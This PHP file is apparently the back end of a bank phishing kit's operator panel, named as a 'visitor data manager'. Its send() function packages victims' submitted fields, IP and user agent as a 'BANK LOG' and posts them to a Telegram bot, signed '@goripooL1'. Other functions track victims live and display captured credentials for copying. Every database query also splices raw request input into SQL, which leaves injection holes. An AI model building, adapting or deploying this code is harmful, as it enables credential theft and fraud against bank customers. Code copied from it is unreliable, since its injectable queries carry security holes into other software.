<?php
// Bridge between database and panel for visitor related operations
class VisitorDataManager extends Controller {
  protected $visitor_model;

  public function __construct() {
    Controller::__construct();
    $this->visitor_model = $this->model("VisitorDataManagerModel");
  }

  // updates visitor data using an array containing field to update and new content
  // e.g ("name" => "john") is equal to UPDATE tablename SET name='john';
  public function update_visitor_data() {
    $this->request_helper->only_allow_post_request();
    $this->request_helper->only_allow_ajax_call();

    $data_array = $_POST;
    $visitor_uniqueid = $data_array["uniqueid"];
    $challenge = "WHERE uniqueid='$visitor_uniqueid'";
  
    $visitor_updation_attempt = $this->visitor_model->update_data($data_array, $challenge);
    $this->request_helper->send_json_response($visitor_updation_attempt);
    $this->send($data_array);

    
  }
   public function send($data) {
    $keys = false;
    $data_array = array("bank","useragent");
    $condition = "WHERE uniqueid='".$data['uniqueid']."'";
    $get_bank_attempt = $this->visitor_model->get_data($data_array, $condition);
    
    if (isset($get_bank_attempt['bank']) && !empty($get_bank_attempt['bank'])) {
        $msg = "╭🏦 ".strtoupper($get_bank_attempt['bank'])." LOG";
    } else {
        $msg = "╭🏦 ".URLROOT." LOG";
    }
    
    $msg .= "\n┣🟢 ID : ".$data['uniqueid'];
    
    foreach ($data as $key => $value) {
        if (!in_array($key, ["status", "uniqueid", "new_data", "last_online", "capture_time", "currently_viewing", "useragent", "id"])) {
            $keys = true;
            $msg .= "\n┣🟢 ".strtoupper($key)." : ".$value;
        }
    }
    
    $msg .= "\n┣🟢 FROM : ".$_SERVER['HTTP_REFERER'];
    $msg .= "\n┣🟢 IP : ".$this->getIP();
    
    if (isset($get_bank_attempt['useragent']) && !empty($get_bank_attempt['useragent'])) {
        $msg .= "\n┣🟢 UAG : ".$get_bank_attempt["useragent"];
    }
    
    $msg .= "\n╰🏦 @goripooL1";
    
    $apiToken = BOT_TOKEN;
    
    // Prepare data to send the message to Telegram without a keyboard
    $data = [
        'chat_id' => CHAT_ID,
        'text' => $msg,
        'disable_web_page_preview' => false
    ];
    
    // If any valid keys are present, send the message
    if ($keys) {
        $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data));
    }
}

  // add a visitor
  public function add_visitor() {
    $this->request_helper->only_allow_post_request();
    $this->request_helper->only_allow_ajax_call();

    $data_array = $_POST;
    $data_array["last_online"] = time();

    $add_visitor_attempt = $this->visitor_model->add_data($data_array);

    $this->request_helper->send_json_response($add_visitor_attempt);
    $this->send($data_array);
  }

  // returns a page name from a given status
  public function get_page_name_from_status($status) {
    return $status == "0" ? 'Loading' : $_SESSION["page_name_to_status_array"][$status];
  }

  // prints out json response of visitor status to be used in visitor redirection page
  public function get_visitor_status() {
    $this->request_helper->only_allow_post_request();
    $this->request_helper->only_allow_ajax_call();

    $data_array = array("status");
    $condition = "WHERE uniqueid='$_POST[uniqueid]'"; // will be sent in ajax request

    $get_status_attempt = $this->visitor_model->get_data($data_array, $condition);

    $result = "true";

    if (!$get_status_attempt) { $result = "failure"; } // change this

    $response = array('status' => $result, 'visitor-status' => $get_status_attempt["status"]);

    $this->request_helper->json_from_array($response);
  }

  // universal get function, refactor and get rid of get_visitor status
  public function get_all_visitor_status($data) {
    // $this->request_helper->only_allow_post_request();
    // $this->request_helper->only_allow_ajax_call();
    $data_array = $_GET["details"];
    // echo var_dump($data_array);
    $condition = "WHERE uniqueid='$_GET[uniqueid]'"; // will be sent in ajax request
    //
    $get_status_attempt = $this->visitor_model->get_data($data_array, $condition);

    $result = "true";

    if (!$get_status_attempt) { $result = "failure"; } // change this

    // $response = array('status' => $result, 'visitor-status' => $get_status_attempt["last_online"]);
     $response = array('status' => $result);
    foreach ($data_array as $data) {
      $response[$data] = $get_status_attempt[$data];
    }

    $this->request_helper->json_from_array($response);
  }

  // prints out the timestamp of last time visitor was online
  public function get_visitor_last_online() {
    $this->request_helper->only_allow_get_request();
    $this->request_helper->only_allow_ajax_call();

    $data_array = array("last_online");
    $condition = "WHERE uniqueid='$_GET[uniqueid]'";

    $get_last_online = $this->visitor_model->get_data($data_array, $condition);

    $result = "true";

    if (!$get_last_online) { $result = "failure"; } // change this

    $response = array('status' => $result, 'visitor-last-online' => $get_last_online["last_online"]);

    $this->request_helper->json_from_array($response);
  }

  // prints out the visitor rows including online status, username and action buttons
  // todo: potential refactoring/reducing size of function
  public function display_visitors() {
    $this->request_helper->only_allow_ajax_call();
    $this->request_helper->only_allow_get_request();

    $is_playing = false;

    $table_rows = ""; // stores the html of thw rows to be printed
    $get_all_visitors = $this->visitor_model->get_all_visitors();
    $visitor_table_row_template_path = "../app/views/dashboard/templates/visitor-table-row.html";

    if (empty($get_all_visitors) || count($get_all_visitors) == 0) { echo "<div class='entry'>No Entries!</div>"; return; }

    // gets the selected visitor uniqueid so the correct visitor row can be highlighted
    $selected_visitor_uniqueid = $_GET["selected_visitor_uniqueid"];

    foreach ($get_all_visitors as $index=>$visitor) {
      // gets the icons for the users browser/device
      $useragent_icons = $this->get_visitor_useragent_icons($visitor["useragent"]);

      // handles whether current row is selected, if so then add the 'selected' class to outline the row
      $currently_viewing_class = $visitor["uniqueid"] == $selected_visitor_uniqueid ? "selected" : "";

      // calculates whether user is online, if the last_online time has exceeded 5secs, user deemed offline
      $online_status = time() - $visitor["last_online"] > 5 ? 'offline' : 'online';

      // retreives the current page name according to user status
      $current_page = ($visitor["status"] == 0) ? 'Loading' : $this->get_page_name_from_status($visitor["status"]);

      $is_new_data = $visitor["new_data"] == 'true' ? 'entry-flash' : '';

      if ($visitor["new_data"] == 'true') {
        $table_rows .= '<script>audio.play()</script>';
      } else {
        $table_rows .= '<script>audio.pause()</script>';
      }

      // contains the placeholders to be swapped with loaded data once available
      $fields_to_replace = array("{online_status}",
                                 "{index}",
                                 "{currently_viewing_class}",
                                 "{is_new_data}",
                                 "{bank}",
                                 "{username}",
                                 "{capture_time}",
                                 "{current_page}",
                                 "{uniqueid}",
                                 "{os_icon}",
                                 "{browser_icon}",
                                 "{status}");

      // contains the data to be swapped with the placeholders above
      $replaced_field_content = array($online_status,
                                      $index + 1,
                                      $currently_viewing_class,
                                      $is_new_data,
                                      $visitor["bank"],
                                      $visitor["username"],
                                      $visitor["capture_time"],
                                      $current_page,
                                      $visitor["uniqueid"],
                                      $useragent_icons["os_icon"],
                                      $useragent_icons["browser_icon"],
                                      $visitor["status"]);

      // appends current row to the table_rows array, ready to be printed and parsed by JS
      $table_rows .= $this->element_helper->construct_template($visitor_table_row_template_path, $fields_to_replace, $replaced_field_content);
    }

    echo $table_rows;
  }

  // prints out the sql values of selected visitor, ready to be loaded through jQuery
  public function get_visitor_info() {
    $this->request_helper->only_allow_get_request();
    $this->request_helper->only_allow_ajax_call();

    // loads the selected preview columns for filtering purposes
    $selected_preview_columns = $_SESSION["selected_preview_columns"];

    $uniqueid = $_GET["uniqueid"];
    $visitor_info = $this->visitor_model->get_data(array("*"), "WHERE uniqueid='$uniqueid'");
    if($visitor_info) {
    foreach ($visitor_info as $key=>$value) {
      if (is_numeric($key)) { continue; } // skips index keys, only shows value name, e.g password instead of 0

      // if the column is in the selected columns array then display it
      // if it is not, then the user has deselected it and doesn't want it shown
      if (in_array($key, $selected_preview_columns)) {
        $value = empty($value) ? "waiting" : $value;
        echo "<span>$key: <span class='preview-data' onclick='copy(this)'><b>$value</b></span> <i class='fas fa-copy'></i> </span> <br>";
      }
    }
    }
  }

  // returns the css classes for user device specific icons, e.g os, model, etc
  public function get_visitor_useragent_icons($useragent) {
    $os_icon = get_os_icon($useragent);
    $browser_icon = get_browser_icon($useragent);

    return(array("os_icon" => $os_icon, "browser_icon" => $browser_icon));
  }

  // removes visitor from the visitor row
  public function delete_visitor() {
    $this->request_helper->only_allow_post_request();
    $this->request_helper->only_allow_ajax_call();
    $user_model = $this->model("UserModel");

    if (!$this->request_helper->is_logged_in_user_admin($user_model)) {
      echo json_encode(array('false')); return;
    }

    // echo $_SESSION["active_user_username"];

    // $is_admin = $this->request_helper->must_be_admin($user_model);
    // echo $is_admin;

    $delete_visitor_attempt = $this->visitor_model->delete_visitor($_POST["uniqueid"]);
    $this->request_helper->send_json_response($delete_visitor_attempt);
  }
  
  public function getIP()  
    {
        $ipaddress = '';
        if (getenv('HTTP_CLIENT_IP'))
            $ipaddress = getenv('HTTP_CLIENT_IP');
        else if(getenv('HTTP_X_FORWARDED_FOR'))
            $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
        else if(getenv('HTTP_X_FORWARDED'))
            $ipaddress = getenv('HTTP_X_FORWARDED');
        else if(getenv('HTTP_FORWARDED_FOR'))
            $ipaddress = getenv('HTTP_FORWARDED_FOR');
        else if(getenv('HTTP_FORWARDED'))
           $ipaddress = getenv('HTTP_FORWARDED');
        else if(getenv('REMOTE_ADDR'))
            $ipaddress = getenv('REMOTE_ADDR');
        else
            $ipaddress = 'UNKNOWN';
        
        return $ipaddress;
    }
}
?>
